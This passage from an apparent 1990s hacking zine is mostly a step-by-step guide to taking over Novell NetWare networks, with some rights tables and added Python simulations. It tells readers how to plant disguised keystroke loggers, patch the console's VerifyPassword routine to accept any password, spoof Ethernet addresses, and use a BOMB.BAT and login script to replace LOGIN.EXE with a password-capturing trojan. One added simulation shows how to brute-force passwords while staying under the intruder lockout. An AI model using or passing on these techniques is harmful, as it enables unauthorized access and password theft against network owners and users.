  Allows a user to modify the trustee assignments or the Inherited Rights
  Mask of a directory or file. It does not allow a user to grant the
  supervisory trustee right, but it does allow them to grant trustee rights
  to others, including themselves, that they do not currently have. In
  practice, then, A is worth every right except S.

What rights does it take to ...?
--------------------------------

  Task                                   Rights needed
  -------------------------------------  ----------------------------------
  Read from a closed file                Read
  See a file name                        File Scan
  Search a directory for a file          File Scan
  Write to a closed file                 Write, Create, Erase, Modify
  Execute an EXE file                    Read, File Scan
  Create and write to a file             Create
  Copy files from a directory            Read, File Scan
  Make a new directory                   Create
  Delete a file                          Erase
  Salvage deleted files                  Read, Write, Create, File Scan,
                                         and Create at the directory level
  Change directory or file attributes    Modify
  Rename a file or directory             Modify
  Change the Inherited Rights Mask       Access Control
  Change trustee assignments             Access Control
  Modify a directory's disk space        Access Control

Who is currently logged in
--------------------------

The "userlist" command will reveal all. The command "userlist /a" lists the
ethernet (node) addresses as well:

  User Information for Server TEMP
  Connection  User Name     Network     Node Address     Login Time
  ----------  ------------  ----------  ---------------  -------------------
       1      SUPERVISOR    [       2]  [  80C7BD547A]   2-12-1997  1:59 pm
       2      GUEST         [       2]  [  20E00EB486]   2-12-1997 10:26 am
       3      FAXHQ         [       2]  [    C06D7C4E]   2-08-1997  3:08 pm
  [Snip]
      42      PRINTER       [       2]  [    C0707C4E]   2-12-1997  1:28 pm
      43      BACKUP        [       2]  [  20E00E9B70]   2-12-1997  3:02 pm
      44      TEMP          [       2]  [  20E00E3F33]   2-12-1997  2:06 pm

The utility getequiv.exe checks a single user, all members of a group or all
users on a server, and lists everyone who has a security equivalence to a
given user or group.

Is accounting installed
-----------------------

To tell if accounting is installed, as any user, load "syscon".
Hit return on "Accounting". If you get "Accounting Not Installed" or "Do you
wish to install accounting", then accounting is not installed. Note that all
accounting records are held in sys:system\net$acct.dat; access to this
directory is for privileged accounts only.

Has TCP/IP been installed on the network
----------------------------------------

In the sys:etc directory there are several files relating to other systems
that could be connected to the same ethernet. All can be edited with a
standard text editor, if you have sufficient rights, or with the EDIT NLM
from the console. Anything from a # to the end of the line is a comment and
is ignored.

SYS:ETC\HOSTS - maps host names to IP addresses. Its format is identical to
/etc/hosts on UNIX systems. A HOSTS entry has the form:
IP_address host_name [alias ...]

  # Mappings of host names and host aliases to IP address.
  #
  130.57.4.2      ta tahiti ta.novell.com loghost
  130.57.6.40     osd-frog frog

SYS:ETC\NETWORKS - maps network names to network addresses. A NETWORKS entry
has the form: network_name network_number [alias ...]

  # Network numbers
  #
  loopback        127             # fictitious internal loopback network
  novellnet       130.57          # Novell's network number

SYS:ETC\PROTOCOL - maps protocol names to IP protocol numbers. The PROTOCOL
file contains information about the known protocols used on the DARPA
Internet. A PROTOCOL entry has the form:
protocol_name protocol_number [alias ...]

  # Internet (IP) protocols
  #
  ip      0       IP      # internet protocol, pseudo protocol number
  icmp    1       ICMP    # internet control message protocol
  tcp     6       TCP     # transmission control protocol
  udp     17      UDP     # user datagram protocol

SYS:ETC\SERVICES - maps service names to transport protocol/well-known port
pairs.

  # Network service mappings. Maps service names to transport
  # protocol and transport protocol ports.
  #
  ftp             21/tcp
  telnet          23/tcp
  smtp            25/tcp          mail
  #
  # Host specific functions
  #
  tftp            69/udp
  finger          79/tcp
  link            87/tcp          ttylink
  #
  # UNIX specific services, these are NOT officially assigned
  #
  exec            512/tcp
  login           513/tcp
  shell           514/tcp         cmd             # no passwords used
  printer         515/tcp         spooler         # experimental

2. NETWARE FOUR
===============

I do not have a Netware 4 server here at the moment, so here is a listing of
commands that will be helpful, but no outputs.

  nlist server /b         - provides a list of the bindery servers on your
                            network and information about the servers.
  nlist server            - provides a list of servers within the current
                            NDS context.
  nlist volume            - views the file server volumes defined within the
                            current NDS context.
  nlist /vol              - gives more detailed volume information.
  ndir [path] /do /sub    - shows information about the directories in the
                            default directory.
  ndir [path] /a          - views information about each file in the default
                            directory.
  ndir [path] /r          - views information about each file and directory
                            in the default directory, in more detail.
  nlist user /a           - lists the users logged into the current NDS
                            context.
  nlist user /b=[server]  - views a list of users defined on the specified
                            server. This is a recommended command.
  rights [path] /t        - views the trustee list of a file or directory in
                            the default or given directory.
  nlist group             - views groups within the current NDS context.
  nlist organization show "login script"
                          - views the login scripts of organizations within
                            the current NDS context.
  cx /t /all              - views the NDS tree from the current NDS context.
  nlist organization show "detect intruder"
                          - shows the intruder detection settings for the
                            organizations within the current NDS context.
  nlist group show "member"
                          - views the groups defined within the current NDS
                            context and the members of each group.
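The Netware 3.1x rights model from the sections above (trustee assignments,
the Inherited Rights Mask, Supervisory propagation, security equivalences and
the "what rights does it take" table) is easier to reason about in code. The
following is an added example written for this issue, not a Novell utility
and not code from the article; the volume layout, users and groups in it are
made up, and the behaviour it models is the 3.x one described above: an
explicit assignment replaces whatever was inherited, the mask filters what is
inherited, and S passes through everything once held.

```python
"""NetWare 3.x trustee rights model (added example, not code from the article).
Directory names, users and groups are made up."""
from __future__ import annotations

RIGHTS = "SRWCEMFA"          # the order in which RIGHTS and NDIR print them
ALL_RIGHTS = frozenset(RIGHTS)

# "What rights does it take to ...?" table above, keyed by task.
TASK_RIGHTS = {
    "read closed file": "R",
    "see file name": "F",
    "write closed file": "WCEM",
    "execute exe": "RF",
    "create and write file": "C",
    "copy files from directory": "RF",
    "make directory": "C",
    "delete file": "E",
    "change attributes": "M",
    "rename": "M",
    "change irm": "A",
    "change trustees": "A",
}


def parse_rights(text: str) -> frozenset[str]:
    """'[ R    F ]' or 'rf' -> frozenset({'R', 'F'})."""
    letters = set(text.strip("[]").replace(" ", "").upper())
    unknown = letters - ALL_RIGHTS
    if unknown:
        raise ValueError("unknown right(s): " + "".join(sorted(unknown)))
    return frozenset(letters)


def format_rights(rights: frozenset[str]) -> str:
    """Inverse of parse_rights, in the '[SRWCEMFA]' style of the RIGHTS output."""
    return "[" + "".join(c if c in rights else " " for c in RIGHTS) + "]"


def _levels(path: str) -> list[str]:
    """'SYS:PUBLIC\\UTIL' -> ['SYS:', 'SYS:PUBLIC', 'SYS:PUBLIC\\UTIL']."""
    volume, _, rest = path.upper().partition(":")
    levels = [volume + ":"]
    for part in rest.strip("\\").split("\\"):
        if part:
            sep = "" if levels[-1].endswith(":") else "\\"
            levels.append(levels[-1] + sep + part)
    return levels


class Volume:
    """Trustee assignments and Inherited Rights Masks for one volume."""

    def __init__(self) -> None:
        self.trustees: dict[tuple[str, str], frozenset[str]] = {}
        self.irm: dict[str, frozenset[str]] = {}

    def grant(self, path: str, trustee: str, rights: str) -> None:
        self.trustees[(path.upper(), trustee.upper())] = parse_rights(rights)

    def set_irm(self, path: str, rights: str) -> None:
        # In 3.x the mask cannot block Supervisory, so S is always in it.
        self.irm[path.upper()] = parse_rights(rights) | {"S"}

    def effective(self, path: str, trustee: str) -> frozenset[str]:
        """Walk from the volume root to `path` for a single trustee."""
        rights: frozenset[str] = frozenset()
        for level in _levels(path):
            explicit = self.trustees.get((level, trustee.upper()))
            if explicit is not None:
                rights = explicit                                  # replaces inherited
            else:
                rights = rights & self.irm.get(level, ALL_RIGHTS)  # filtered by IRM
            if "S" in rights:
                return ALL_RIGHTS   # S propagates down; no IRM below can revoke it
        return rights

    def effective_for_user(self, path: str, user: str,
                           equivalences: dict[str, set[str]]) -> frozenset[str]:
        """The 'whoami /a' view: the user plus every group or user it is
        security-equivalent to (which is why a SUPERVISOR equivalence is gold)."""
        names = {user.upper()} | {e.upper() for e in equivalences.get(user.upper(), set())}
        combined: frozenset[str] = frozenset()
        for name in names:
            combined |= self.effective(path, name)
        return ALL_RIGHTS if "S" in combined else combined


def can(task: str, rights: frozenset[str]) -> bool:
    """True if `rights` covers a task from the table (S covers everything)."""
    return "S" in rights or frozenset(TASK_RIGHTS[task]) <= rights


def demo() -> dict[str, str]:
    """Constructed FS3-like layout; returns a rights string per user@directory."""
    vol = Volume()
    vol.grant("SYS:", "SUPERVISOR", "S")            # S at the root
    vol.grant("SYS:PUBLIC", "EVERYONE", "RF")        # run the utilities
    vol.grant("SYS:MAIL", "EVERYONE", "C")           # the 3.x mail drop box
    vol.set_irm("SYS:PUBLIC\\UTIL", "R")             # strip F below PUBLIC
    vol.grant("SYS:PUBLIC\\UTIL", "GUEST", "RWF")    # explicit beats inherited
    equiv = {"GUEST": {"EVERYONE"}, "JOE": {"EVERYONE", "SUPERVISOR"}}
    where = [("SUPERVISOR", "SYS:SYSTEM"), ("GUEST", "SYS:MAIL\\1"),
             ("GUEST", "SYS:PUBLIC\\UTIL"), ("JOE", "SYS:SYSTEM")]
    return {f"{u}@{p}": format_rights(vol.effective_for_user(p, u, equiv)) for u, p in where}


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:24} {value}")
```

GUEST ends up with only [   C    ] in SYS:MAIL\1: enough to drop a file in,
not enough to see what is already there, which is exactly the property the
mail directory attack later in this article relies on.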
Is auditing installed
---------------------

A new feature in Netware 4 is the ability for an auditor to independently
supervise the network. Here is a "c" file that should show whether auditing
has been enabled on your container, as any user. I say should due to the
fact that I do not have the client API's to compile it. If anyone does
compile this please send it to me.

  /* audit.c - report whether NDS container auditing is enabled.
   * The header names were lost when this issue was converted to ascii:
   * stdio.h/stdlib.h are needed for printf/exit, and the two NetWare
   * Client SDK headers named below are assumed. */
  #include <stdio.h>
  #include <stdlib.h>
  #include <nwcalls.h>   /* NWCCODE, NWCONN_HANDLE, NWOBJ_ID (assumed) */
  #include <nwnet.h>     /* NWDS* context, unicode and audit calls (assumed) */

  void FreeUnicodeTables(void);
  void FreeContext(NWDSContextHandle context);

  int main(void)
  {
     NWContainerAuditStatus dsStatus;
     NWDSContextHandle      dContext;
     NWCONN_HANDLE          dsconnhandle;
     NWOBJ_ID               containerID;
     NWCCODE                ccode;
     char nameContext[MAX_DN_CHARS + 1] = "";
     int  countrycode, codepage;

     countrycode = 001;
  #ifdef N_PLAT_UNIX
     codepage = 88591;
  #else
     codepage = 437;
  #endif

     /* Unicode tables must be loaded before any NWDS call. */
     ccode = NWInitUnicodeTables(countrycode, codepage);
     if (ccode) {
        printf("\nNWInitUnicodeTables error\n");
        exit(1);
     }

     dContext = NWDSCreateContext();
     if (dContext == ERR_CONTEXT_CREATION) {
        printf("\nNWDSCreateContext error %X\n", dContext);
        FreeUnicodeTables();            /* exits */
     }

     /* Which container are we logged into? */
     ccode = NWDSGetContext(dContext, DCK_NAME_CONTEXT, nameContext);
     if (ccode) {
        printf("\nNWDSGetContext error %X\n", ccode);
        FreeContext(dContext);          /* exits */
     }

     /* Resolve the container to a connection handle and object ID ... */
     ccode = NWDSAuditGetObjectID(dContext, nameContext, &dsconnhandle,
                                  &containerID);
     if (ccode) {
        printf("\nNWDSAuditGetObjectID error %X for object %s\n",
               ccode, nameContext);
        FreeContext(dContext);
     }

     /* ... and ask the server for its audit status. */
     ccode = NWDSGetContainerAuditStats(dsconnhandle, containerID,
                                        &dsStatus, sizeof(dsStatus));
     if (ccode) {
        printf("\nNWDSGetContainerAuditStats error %X\n", ccode);
        FreeContext(dContext);
     }

     printf("Audit is %s on %s.\n",
            (dsStatus.auditingEnableFlag ? "enabled" : "disabled"),
            nameContext);

     NWDSFreeContext(dContext);
     NWFreeUnicodeTables();
  }

  /* Both cleanup helpers are only reached on an error path, so they exit. */
  void FreeContext(NWDSContextHandle context)
  {
     NWDSFreeContext(context);
     FreeUnicodeTables();
  }

  void FreeUnicodeTables(void)
  {
     NWFreeUnicodeTables();
     exit(1);
  }

How a Uebercracker gets Supervisor rights and a few tricks
==========================================================

Cracking the bios password
--------------------------

Source: alt.2600 faq

Some BIOS's allow you to require a password to be entered before the system
will boot. Some BIOS's allow you to require a password to be entered before
the BIOS setup may be accessed.

The most common BIOS password attack programs are for AMI BIOS. Some
password attack programs will return the AMI BIOS password in plain text,
some will return it in ASCII codes, some will return it in scan codes. This
appears to depend not just on the password attacker but also on the version
of AMI BIOS. To obtain AMI BIOS password attackers, ftp to
ftp.oak.oakland.edu /simtel/msdos/sysutil/.

If you cannot access the machine after it has been powered up, it is still
possible to get past the password. The password is stored in CMOS memory
that is maintained while the PC is powered off by a small battery attached
to the motherboard. If you remove this battery, all CMOS information will be
lost. You will need to re-enter the correct CMOS setup information to use
the machine. The machine's owner or user will most likely be alarmed when it
is discovered that the BIOS password has been deleted.

On some motherboards the battery is soldered to the motherboard, making it
difficult to remove. If this is the case, you have another alternative.
Somewhere on the motherboard you should find a jumper that will clear the
BIOS password. If you have the motherboard documentation, you will know
where that jumper is. If not, the jumper may be labelled on the motherboard.
If you are not fortunate enough for either of these to be the case, you may
be able to guess which jumper is the correct one. This jumper usually stands
alone near the battery.

Just getting the dos prompt
---------------------------

You might be thinking, what, a dos prompt .... doesn't everyone have one?

Scenario: The machine is booted in the morning with a bios password, logged
into the network and Windows is loaded. But the ALT+F column is disabled by
a security program. There are no dos-prompt icons, and the only program is
Netscape. The standard Windows programs are there other than File Manager.
The autoexec.bat, config.sys and the network file (called from the
autoexec.bat as c:\nwclient\startnet) are read-only.

Solution: One, load Netscape and open the General Preferences section.
Change the "view source" application to command.com. Next time the viewer
is loaded, say thank you, and there is a dos prompt.

If Netscape is not available, the order of execution of dos files (next
section) becomes useful. Place a .com in the same directory as startnet.bat.
The .com file will execute before the batch file, loading any program you
wish before the computer logs into the network. One possibility would be a
keystroke logger to catch the password. But how to place the .com in
c:\nwclient when there is no dos prompt or File Manager? Use write.exe (if
you didn't have Netscape) to open the .com file from drive a: and save it in
the same directory as startnet.bat. Note that only write.exe, not
notepad.exe, has the ability to save .com files. In one swoop you have a dos
prompt and the network password, without the knowledge of the administrator.

The Execution Order of Dos Files
--------------------------------

Remember the execution order of dos files:

  1. COM
  2. EXE
  3. BAT

If you remember this, and if the full name of the file (ie
c:\nwclient\startnet.bat) is not stated, a replacement com or exe file can
be installed.
To be a little smarter: few people have rights to the Novell operating
system files, but they usually do to spreadsheet or wordprocessor programs.
Another useful idea is in regard to modem programs. Most netware lans have
modem programs loaded onto them. A simple trap would be to hide a com file,
which would load before the exe, load a keystroke trapper and capture all
passwords etc that are passed over the modem. If the com file was hidden and
used only on a temporary basis, this could prove effective, depending on the
skill of your administrator.

Finding valid accounts and passwords
------------------------------------

To crack a novell network, first of all you need an account. Trying the
default SUPERVISOR and GUEST would be the first place to start. Often the
guest account will have no password. Beware of intruder detection. Others
you might like to try include:

  Backup       Fax          Faxuser      Faxworks
  Faxhq        Hplaser      Laser        Laserwriter
  Post         Print        Printer      Router
  Student      Temp         Test         Wangtek

Login security in layman's terms consists of the following four steps:

  1. The user logs into the network by specifying the file server name and
     username. The system verifies the username by matching it against an
     object in the NET$OBJ.SYS bindery file. Whether or not the username
     exists, Netware prompts for a password.

  2. If the system verifies the username, it searches the NET$PROP.SYS file
     for a password property. If one exists, it responds with "Password:".
     If a password property doesn't exist, the system jumps to step 4.

  3. The user enters a password. If the username is valid, Netware compares
     this input to the value in NET$VAL.SYS (this database actually holds
     the encrypted passwords). If the username is not valid, the system
     bypasses the search and responds with "Access Denied".

  4. If the user entered the correct password for this username, they will
     be granted conditional access to the LAN. If not, the system responds
     with "Access Denied".
Next the system matches the username with a variety of additional bindery
values. Therefore you should notice that invalid usernames respond much more
quickly with "Access Denied", as netware doesn't search the bindery for the
passwords of invalid usernames. The response time tells you whether an
account exists before you have guessed a single password.

Another way is to use the utility doskey. As most people will know, doskey
keeps your previous commands in memory. A simple F7 will often reveal a lot.
Note if you do not wish anyone to follow your tracks, ALT+F7 will clear the
memory.

Install a KeyStroke Trapper
---------------------------

Installing a keystroke logger is one of the most deadly hacking methods on
IBM pc's. By looking at a config.sys and autoexec.bat, and the general
layout of a pc, you can usually tell how advanced the user is. For example,
lots of temp files in the root directory and little organisation of the
startup files usually indicates the user would not notice if one line was
temporarily added to the autoexec.bat. Either way, copy the keylogging
program to the c:\dos directory. Rename it to something like doskey or mouse
or some other tsr, copy the old file to *.old and hide it through
"attrib +h", or remove it totally. Changing the dates of the keylogging
program and autoexec.bat back to the originals is also an option if needed.

Brute Force Password Cracking
-----------------------------

While I find this option is for the desperate, it is still an option. The
program nwpcrack.exe will take a dictionary and then attempt to guess a
user's password. Notice this could alert the administrator to your hacking
presence if intruder detection is installed. Also, if intruder detection is
installed, this program will keep trying passwords even after the account
has been locked, so every guess made during the lockout is wasted: a locked
account refuses even the correct password.
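To make the four login steps and intruder detection concrete, here is an
added example (mine, not code from the article, and no substitute for
nwpcrack): a simulated bindery that consults more files for a real account
than for an unknown one (the timing oracle above), locks an account after a
threshold of bad attempts within the retention time, and two dictionary
attackers run against it, one blind to lockout like the tool described above
and one that stays under the threshold. The threshold and timers are values
assumed for the example, not Novell's defaults; the accounts and word list
are constructed.

```python
"""NetWare 3.x login sequence and intruder detection, simulated (added example,
not code from the article; thresholds, accounts and words are constructed)."""
from __future__ import annotations
from dataclasses import dataclass
from typing import Optional


@dataclass
class IntruderDetection:
    enabled: bool = True
    threshold: int = 3            # bad attempts that trigger a lockout (assumed)
    retention: float = 30 * 60    # seconds a bad-login count is kept (assumed)
    lockout: float = 15 * 60      # seconds the account stays locked (assumed)


@dataclass
class Account:
    password: Optional[str]       # None = no password property in NET$PROP.SYS
    bad_count: int = 0
    first_bad: float = 0.0
    locked_until: float = 0.0


class Bindery:
    """The server's side of the four login steps, plus intruder detection."""

    def __init__(self, accounts: dict[str, Optional[str]], policy: IntruderDetection):
        self.accounts = {u.upper(): Account(p) for u, p in accounts.items()}
        self.policy = policy
        self.log: list[str] = []  # what SYS$LOG.ERR would record

    def login(self, user: str, password: str, now: float) -> tuple[bool, int]:
        """Return (granted, number of bindery files consulted)."""
        acct = self.accounts.get(user.upper())
        if acct is None:
            return False, 1       # step 1: NET$OBJ.SYS miss; NET$PROP/NET$VAL never searched
        if acct.password is None:
            return True, 2        # step 2: no password property, straight to step 4
        lookups = 3               # NET$OBJ, NET$PROP and NET$VAL all consulted
        if now < acct.locked_until:
            return False, lookups  # locked out: even the right password is refused
        if password == acct.password:
            acct.bad_count = 0
            return True, lookups
        self._record_bad(user.upper(), acct, now)
        return False, lookups

    def _record_bad(self, user: str, acct: Account, now: float) -> None:
        if not self.policy.enabled:
            return
        if acct.bad_count == 0 or now - acct.first_bad > self.policy.retention:
            acct.bad_count, acct.first_bad = 0, now      # old count has aged out
        acct.bad_count += 1
        if acct.bad_count >= self.policy.threshold:
            acct.locked_until = now + self.policy.lockout
            acct.bad_count = 0
            self.log.append(f"Intruder lockout on account {user}")


def username_exists(bindery: Bindery, name: str, now: float = 0.0) -> bool:
    """The oracle from step 3: a real account costs more lookups, so more
    time, than an unknown one. Note it costs one bad attempt on a real account."""
    _, lookups = bindery.login(name, "x", now)
    return lookups > 1


def naive_crack(bindery: Bindery, user: str, words: list[str]) -> tuple[Optional[str], int]:
    """nwpcrack style: a guess a second, blind to lockout. Returns (password, guesses)."""
    for i, word in enumerate(words):
        granted, _ = bindery.login(user, word, now=float(i))
        if granted:
            return word, i + 1
    return None, len(words)


def careful_crack(bindery: Bindery, user: str, words: list[str],
                  policy: IntruderDetection) -> tuple[Optional[str], float]:
    """Stay one guess below the threshold per retention window, then wait for
    the count to age out. Returns (password, simulated seconds spent)."""
    per_window = max(policy.threshold - 1, 1)   # threshold 1 locks on every miss anyway
    now, tried = 0.0, 0
    for word in words:
        if tried and tried % per_window == 0:
            now += policy.retention + 1          # count has reset; fresh window
        granted, _ = bindery.login(user, word, now)
        tried += 1
        if granted:
            return word, now
    return None, now


ACCOUNTS = {"SUPERVISOR": "letmein", "GUEST": None, "TEMP": "temp"}   # constructed
WORDS = ["password", "secret", "novell", "letmein", "admin"]          # constructed


def demo() -> dict:
    policy = IntruderDetection(threshold=3)
    probe, blind, careful = (Bindery(ACCOUNTS, policy) for _ in range(3))
    return {
        "exists": (username_exists(probe, "SUPERVISOR"), username_exists(probe, "NOBODY")),
        "naive": naive_crack(blind, "SUPERVISOR", WORDS),
        "naive_log": list(blind.log),
        "careful": careful_crack(careful, "SUPERVISOR", WORDS, policy),
        "careful_log": list(careful.log),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k:12} {v}")
```

With a threshold of three, the blind attacker locks SUPERVISOR on its third
guess, throws away "letmein" on the fourth and leaves an intruder lockout in
the log; the careful one finds it, at the price of waiting out one retention
window.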
How to remove password validation
---------------------------------

To disable password verification at the console, enter the internal debugger
with:

  "left-shift" "right-shift" "alt" "esc"

First save what is there so you can put it back later:

  d VerifyPassword 6        - write down the 6 byte response

then patch the function and continue:

  c VerifyPassword=B8 0 0 0 0 C3
  g

(B8 00 00 00 00 is "mov eax,0" and C3 is "ret", six bytes in all, so
VerifyPassword now returns 0 for any password and the caller treats every
password as correct. Note that SECURE CONSOLE blocks keyboard entry into the
debugger.)

To restore password verification, re-enter the debugger and type:

  c VerifyPassword=xx xx xx xx xx xx
  g

Ethernet address spoofing with ODI
----------------------------------

Source: Edited heavily from Phrack ?? by Otaku

Login as GUEST or a normal account. Try to see who else is on the system:

  USERLIST /A > c:\ulist.txt

will give you a list of users currently logged in, with their Ethernet card
addresses, saved to a text file. Your current connection will be marked with
an asterisk.

Security aware Novell supervisors will have set up Backup accounts with an
extra level of security which restricts logins to only those Ethernet
addresses which have been specified. The really sensible ones will have made
sure that any such machines are sited in physically secure areas as well.
Although this is a very good idea from the security point of view, Novell
have now provided a mechanism which allows you to get around it: the
replacement for monolithic IPX/NETX called Open Datalink Interface (ODI).

Novell's ODI, and its slower Microsoft equivalent, the Network Driver
Interface Specification (NDIS), both work by putting a common layer of
software between the hardware of the Network Interface Card and the rest of
the MSDOS Redirector. This allows multiple protocol stacks and frame types
to be bound to the same physical card:

  e.g.  IPX   TCP/IP   NETBeui   DECnet   Appletalk
  ------------------------------------------------
                 Link Support Layer
  ------------------------------------------------
        Hardware specific device driver e.g. NE2000

Under ODI, to load your drivers to enter the network:

  LSL
  NE2000
  IPXODI
  NETX

With ODI there are more parameters for NET.CFG, but the worrying/interesting
one is the ability to specify a different MAC level address to that of your
actual Ethernet card.
It needs this ability to cope with TCP/IP or DECnet coexistence, e.g.

  BUFFERS 100
  MACHINE TYPE COMPAQ
  PREFERRED SERVER FINANCE
  NODE ADDRESS AA-00-04-00-12-34

(NODE ADDRESS is a parameter of the Link Driver section of NET.CFG.)

Since this DECnet address does not depend on the "real" unique Ethernet
address which has been burnt into the PROM on the card and is centrally
registered, this mechanism allows you to put a different Ethernet card
address into NET.CFG, thereby fooling the Address Restriction security, e.g.

  NODE ADDRESS 02-60-80-12-34-56

This is where the data you gathered earlier with USERLIST and SYSCON becomes
threatening/useful. Of course, if your target PC is on a different LAN
segment, there may be routers or intelligent hubs which restrict your
ability to do this, or at least record attempts in log files which can trace
your activity, provided that suspicions are aroused before the logs are
periodically wiped.

If you set this connection parameter to be the same as that of another PC,
the fileserver (Novell, DEC or UNIX) and the Ethernet have no way of
preventing some packets intended for one unique address going to the other,
if both are online at the same time. This usually results in PC hangs,
incomplete closure of files and File Allocation Table problems. If, by
accident or design, you set your PC to have the same address as the
fileserver (Novell, DEC or UNIX) or a router, then you can cause havoc to
the whole network segment.

Checking your rights in certain directories
-------------------------------------------

As previously stated, use "whoami /a" to list the groups you belong to,
security equivalences and your effective rights.

The sys:system directory

If you have rights to f:\system, try to grab the rconsole password in the
autoexec.ncf, or the bindery files in the same directory. Note these are
hidden files, *.sys; "ndir /h" views all hidden files.

The sys:login directory

If you have access to this directory, well .... (see "Trojaning the Netware
Login Process" below).
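Since everything here hinges on what USERLIST /A showed and on the NODE
ADDRESS line, here is an added example (mine, not from the article or from
Novell) that parses that output, restores the leading zeros Netware strips
from node addresses, and checks for the three things a supervisor would look
for after reading this section: one node address carrying two connections,
a restricted account logged in from a node it should not be on, and a
NET.CFG that sets NODE ADDRESS at all. The USERLIST output and NET.CFG in it
are constructed for the example; the station restriction list is assumed.

```python
"""USERLIST /A parser and node-address checks (added example, not from the
article). Sample output and NET.CFG are constructed."""
from __future__ import annotations
import re
from dataclasses import dataclass

# Constructed USERLIST /A output in the format shown earlier; connection 2 is
# "me" (the asterisk), and BACKUP appears twice from the same node address.
USERLIST_SAMPLE = """\
User Information for Server TEMP
Connection  User Name     Network     Node Address     Login Time
----------  ------------  ----------  ---------------  -------------------
     1      SUPERVISOR    [       2]  [  80C7BD547A]   2-12-1997  1:59 pm
     2    * GUEST         [       2]  [  20E00EB486]   2-12-1997 10:26 am
     3      FAXHQ         [       2]  [    C06D7C4E]   2-08-1997  3:08 pm
    43      BACKUP        [       2]  [  20E00E9B70]   2-12-1997  3:02 pm
    44      TEMP          [       2]  [  20E00E3F33]   2-12-1997  2:06 pm
    45      BACKUP        [       2]  [  20E00E9B70]   2-12-1997  3:05 pm
"""

# Constructed NET.CFG with the override from the text in its Link Driver section.
NET_CFG_SAMPLE = """\
Link Driver NE2000
    INT 5
    PORT 300
    NODE ADDRESS 02-60-80-12-34-56
PREFERRED SERVER FINANCE
"""

LINE_RE = re.compile(
    r"^\s*(?P<conn>\d+)\s+(?P<me>\*?)\s*(?P<user>\S+)\s+"
    r"\[\s*(?P<net>[0-9A-Fa-f]+)\]\s+\[\s*(?P<node>[0-9A-Fa-f]+)\]\s+(?P<when>.+?)\s*$"
)


@dataclass(frozen=True)
class Session:
    connection: int
    user: str
    network: str       # 8 hex digits
    node: str          # 'XX-XX-XX-XX-XX-XX'
    login_time: str
    is_me: bool


def normalize_node(raw: str) -> str:
    """USERLIST prints node addresses without leading zeros ('C06D7C4E');
    restore 12 hex digits and format as 00-00-C0-6D-7C-4E."""
    digits = re.sub(r"[^0-9A-Fa-f]", "", raw).upper().zfill(12)
    if len(digits) != 12:
        raise ValueError(f"bad node address: {raw!r}")
    return "-".join(digits[i:i + 2] for i in range(0, 12, 2))


def parse_userlist(text: str) -> list[Session]:
    sessions = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            sessions.append(Session(int(m["conn"]), m["user"].upper(),
                                    m["net"].upper().zfill(8), normalize_node(m["node"]),
                                    m["when"], m["me"] == "*"))
    return sessions


def duplicate_nodes(sessions: list[Session]) -> dict[str, list[str]]:
    """Node addresses carrying more than one connection: the collision a
    cloned NODE ADDRESS produces while the real station is still logged in."""
    by_node: dict[str, list[str]] = {}
    for s in sessions:
        by_node.setdefault(s.node, []).append(s.user)
    return {node: users for node, users in by_node.items() if len(users) > 1}


def station_violations(sessions: list[Session], allowed: dict[str, set[str]]) -> list[Session]:
    """Sessions of restricted accounts that come from a node not on their list."""
    return [s for s in sessions if s.user in allowed and s.node not in allowed[s.user]]


def is_locally_administered(node: str) -> bool:
    """Bit 1 of the first octet marks a software-assigned address. Burned-in
    vendor addresses have it clear; 02-xx-... and DECnet AA-00-04-... have it set."""
    return bool(int(node.split("-")[0], 16) & 0x02)


def net_cfg_node_override(cfg: str) -> str | None:
    """The NODE ADDRESS set in a NET.CFG, normalised, or None if the card's own is used."""
    m = re.search(r"^\s*NODE\s+ADDRESS\s+([0-9A-Fa-f:\-]+)", cfg, re.I | re.M)
    return normalize_node(m.group(1)) if m else None


if __name__ == "__main__":
    sessions = parse_userlist(USERLIST_SAMPLE)
    print("duplicates:", duplicate_nodes(sessions))
    print("NET.CFG override:", net_cfg_node_override(NET_CFG_SAMPLE))
```

The locally administered bit is the giveaway for the example override in
the text: 02-60-80-12-34-56 could never have come out of a card's PROM.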
Abusing the Mail Directory Rights
---------------------------------

Most of this attack is taken from the Netware Hack FAQ.

In 3.x the group EVERYONE has Create rights in SYS:MAIL. This means any user
(including GUEST) has the ability to write files to any subdirectory in
SYS:MAIL. The first versions of Netware included a simple e-mail package,
and every user that is created gets a subdirectory in MAIL with RCWEMF,
named after their object ID number. One consistent number is the number 1,
which is always assigned to Supervisor.

Here's one way to exploit it:

  - Login as GUEST and change to the SYS:MAIL subdirectory.

  - Type DIR. You will see one subdirectory, the one owned by GUEST. Change
    into that directory (the example here is C0003043).

  - Type DIR. If there is no file named LOGIN, you can bet there may not be
    one for Supervisor. If there is a default-looking LOGIN file, even a
    zero length file, you cannot proceed.

  - Copy PROP.EXE and LOGIN.EXE (the itsme version) to SYS:MAIL\C0003043.

  - Create a batch file (the example here is BOMB.BAT) with the following
    entries:

      @ECHO OFF
      FLAG \LOGIN\LOGIN.EXE N > NUL
      COPY \MAIL\C0003043\LOGIN.EXE \LOGIN\LOGIN.EXE > NUL
      FLAG \LOGIN\LOGIN.EXE SRO > NUL
      \MAIL\C0003043\PROP -C > NUL

  - Create a LOGIN file (a login script) with the following entries:

      MAP DISPLAY OFF
      MAP ERRORS OFF
      MAP G:=SYS:
      DRIVE G:
      #COMMAND /C \MAIL\1\BOMB
      DRIVE F:
      MAP DELETE G:

  - Now copy the files to the Supervisor's SYS:MAIL directory from a drive
    mapped to the SYS: volume. Create rights let you write new files there
    even though you cannot list the directory:

      TYPE BOMB.BAT > \MAIL\1\BOMB.BAT
      TYPE LOGIN > \MAIL\1\LOGIN

  - The next time the Supervisor logs in, the LOGIN.EXE is replaced and
    PROP.EXE is run, capturing passwords. Run PROP.EXE later to get the
    passwords, and once you have all the passwords you need (including
    Supervisor), delete your LOGIN and BOMB.BAT files.

Admins can defeat this by creating default personal login scripts or by
adding an EXIT command to the end of the system login script.
Later versions of Netware create a zero-length LOGIN file at ID creation time
in the SYS:MAIL directories to defeat this.

Strolling over to the Console
-----------------------------

If the monitor has not been assigned a password, usually "secure console"
will not be loaded either. SECURE CONSOLE stops NLMs from being loaded from
drive a: or any directory other than sys:system, removes DOS and blocks
keyboard entry into the debugger. If a monitor password has been assigned,
oops: reboot the server and there will not be one.

To add a user from the console use burglar.nlm. This will create a
super-user of your choice. To change any user's password use setpwd.nlm.

Hack.exe ... no Packet Signatures
---------------------------------

If you are on a 3.1x network and no packet signatures are in use, you can
